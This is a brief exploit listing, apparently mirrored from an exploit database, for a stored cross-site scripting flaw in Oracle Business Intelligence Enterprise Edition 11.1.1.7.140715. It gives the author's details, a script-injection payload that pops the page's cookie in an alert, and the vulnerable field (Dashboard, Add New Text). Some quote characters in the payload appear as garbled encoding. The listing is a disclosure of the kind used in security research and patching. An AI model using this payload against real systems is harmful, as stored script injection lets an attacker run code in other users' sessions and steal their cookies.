Share
## https://sploitus.com/exploit?id=PACKETSTORM:161034
# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS  
# Exploit Author: omurugur  
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html  
# Version: 11.1.1.7.140715  
# Author Web: https://www.justsecnow.com  
# Author Social: @omurugurrr  
  
Stored XSS:  
  
โ€œ;!โ€”โ€œโ€<script>alert(document.cookie);</script>=&{(alert(document.cokie))}  
  
Vulnerable area = Dashboard - Add New Text